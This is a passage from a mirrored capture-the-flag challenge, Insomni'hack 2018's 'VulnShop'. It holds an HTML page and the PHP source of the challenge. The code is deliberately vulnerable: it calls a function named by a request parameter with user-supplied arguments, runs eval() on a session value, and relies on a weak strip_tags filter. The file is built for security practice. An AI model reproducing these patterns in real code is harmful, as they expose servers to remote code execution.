 9 | 		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
10 | 		<style>
11 | 			body {
12 | 				background-color: #aaa;
13 | 				color:#fff;
14 | 			}
15 | 			
16 | 			.page {
17 | 				width: 50%;
18 | 				margin: 0 auto;
19 | 				margin-top: 75px;
20 | 			}
21 | 			
22 | 			
23 | 			.menu ul li {
24 | 				display:inline-block;
25 | 				vertical-align:top;
26 | 				margin-right: 30px;
27 | 				
28 | 			}
29 | 		</style>
30 | 	</head>
31 | 	<body>
32 | 		<div class="page">
33 | 			<div class="menu">
34 | 				<ul>
35 | 					<li><a href="index1380.html?page=default">Home</a></li>
36 | 					<li><a href="index32da.html?page=introduction">Introduction</a></li>
37 | 					<li><a href="index8a5f.html?page=privacy">Privacy</a></li>
38 | 					<li><a href="index84f6.html?page=contactus">Contact</a></li>
39 | 				</ul>
40 | 			</div>
41 | 			
42 |             <div class="content">
43 |                 <p>Welcome to our website about infosec. It's still under construction, but you can begin to browse some pages!</p>	        </div>
44 | 		</div>
45 | 		<p><a href="index2b4c.html?hl">View code source of the file, to be sure we're secure!</a></p>
46 | 		<p><a href="phpinfo.html">Show our configurations</a></p>
47 | 	</body>
48 | 
49 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=default by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
50 | </html>
51 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index2b4c.html:
--------------------------------------------------------------------------------
1 | <code><span style="color: #000000">
2 | <span style="color: #0000BB">&lt;?php&nbsp;</span><span style="color: #007700">if(isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'hl'</span><span style="color: #007700">])){&nbsp;</span><span style="color: #0000BB">highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);&nbsp;exit;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">error_reporting</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">session_start</span><span style="color: #007700">();&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;Anti&nbsp;XSS&nbsp;filter
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$_REQUEST&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_map</span><span style="color: #007700">(</span><span style="color: #DD0000">"strip_tags"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">);
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;For&nbsp;later,&nbsp;when&nbsp;we&nbsp;will&nbsp;store&nbsp;infos&nbsp;about&nbsp;visitors.
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">chdir</span><span style="color: #007700">(</span><span style="color: #DD0000">"tmp"</span><span style="color: #007700">);
<br /></span><span style="color: #0000BB">?&gt;
<br /></span>&lt;!DOCTYPE&nbsp;html&gt;
<br />&lt;html&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&lt;head&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;title&gt;Work&nbsp;in&nbsp;progress...&lt;/title&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;meta&nbsp;charset="utf-8"&nbsp;/&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;meta&nbsp;http-equiv="content-type"&nbsp;content="text/html;&nbsp;charset=utf-8"&nbsp;/&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;style&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;background-color:&nbsp;#aaa;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;color:#fff;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.page&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;width:&nbsp;50%;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;margin:&nbsp;0&nbsp;auto;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;margin-top:&nbsp;75px;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.menu&nbsp;ul&nbsp;li&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;display:inline-block;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vertical-align:top;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;margin-right:&nbsp;30px;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/style&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&lt;/head&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&lt;body&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;div&nbsp;class="page"&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;div&nbsp;class="menu"&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ul&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;li&gt;&lt;a&nbsp;href="?page=default"&gt;Home&lt;/a&gt;&lt;/li&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;li&gt;&lt;a&nbsp;href="?page=introduction"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;li&gt;&lt;a&nbsp;href="?page=privacy"&gt;Privacy&lt;/a&gt;&lt;/li&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;li&gt;&lt;a&nbsp;href="?page=contactus"&gt;Contact&lt;/a&gt;&lt;/li&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ul&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/div&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;div&nbsp;class="content"&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span style="color: #0000BB">&lt;?php
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">switch(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">])&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'default'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;default:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;p&gt;Welcome&nbsp;to&nbsp;our&nbsp;website&nbsp;about&nbsp;infosec.&nbsp;It's&nbsp;still&nbsp;under&nbsp;construction,&nbsp;but&nbsp;you&nbsp;can&nbsp;begin&nbsp;to&nbsp;browse&nbsp;some&nbsp;pages!&lt;/p&gt;"</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'introduction'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;p&gt;Our&nbsp;website&nbsp;will&nbsp;introduce&nbsp;some&nbsp;new&nbsp;vulnerabilities.&nbsp;Let's&nbsp;check&nbsp;it&nbsp;out&nbsp;later!&lt;/p&gt;"</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'privacy'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;p&gt;This&nbsp;website&nbsp;is&nbsp;unbreakable,&nbsp;so&nbsp;don't&nbsp;worry&nbsp;when&nbsp;contacting&nbsp;us&nbsp;about&nbsp;some&nbsp;new&nbsp;vulnerabilities!&lt;/p&gt;"</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'contactus'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;</span><span style="color: #DD0000">"&lt;p&gt;You&nbsp;can't&nbsp;contact&nbsp;us&nbsp;for&nbsp;the&nbsp;moment,&nbsp;but&nbsp;it&nbsp;will&nbsp;be&nbsp;available&nbsp;later.&lt;/p&gt;"</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">]&nbsp;=&nbsp;</span><span style="color: #0000BB">rand</span><span style="color: #007700">(</span><span style="color: #0000BB">100000</span><span style="color: #007700">,</span><span style="color: #0000BB">999999</span><span style="color: #007700">);
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'captcha'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(isset(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">]))&nbsp;echo&nbsp;</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">];
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;Will&nbsp;make&nbsp;an&nbsp;image&nbsp;later
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">touch</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">]);
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #DD0000">'captcha-verify'</span><span style="color: #007700">:
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;verification&nbsp;functions&nbsp;take&nbsp;a&nbsp;file&nbsp;for&nbsp;later,&nbsp;when&nbsp;we'll&nbsp;provide&nbsp;more&nbsp;way&nbsp;of&nbsp;verification
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">function&nbsp;</span><span style="color: #0000BB">verifyFromString</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$response</span><span style="color: #007700">)&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">]&nbsp;===&nbsp;</span><span style="color: #0000BB">$response</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF8000">//&nbsp;Captcha&nbsp;from&nbsp;math&nbsp;op
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">function&nbsp;</span><span style="color: #0000BB">verifyFromMath</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$response</span><span style="color: #007700">)&nbsp;{
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(eval(</span><span style="color: #DD0000">"return&nbsp;"</span><span style="color: #007700">.</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">].</span><span style="color: #DD0000">"&nbsp;;"</span><span style="color: #007700">)&nbsp;===&nbsp;</span><span style="color: #0000BB">$response</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(isset(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'answer'</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;isset(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'method'</span><span style="color: #007700">])&nbsp;&amp;&amp;&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'method'</span><span style="color: #007700">])){
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'method'</span><span style="color: #007700">](</span><span style="color: #DD0000">"./"</span><span style="color: #007700">.</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'challenge'</span><span style="color: #007700">],&nbsp;</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'answer'</span><span style="color: #007700">]);
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
<br />
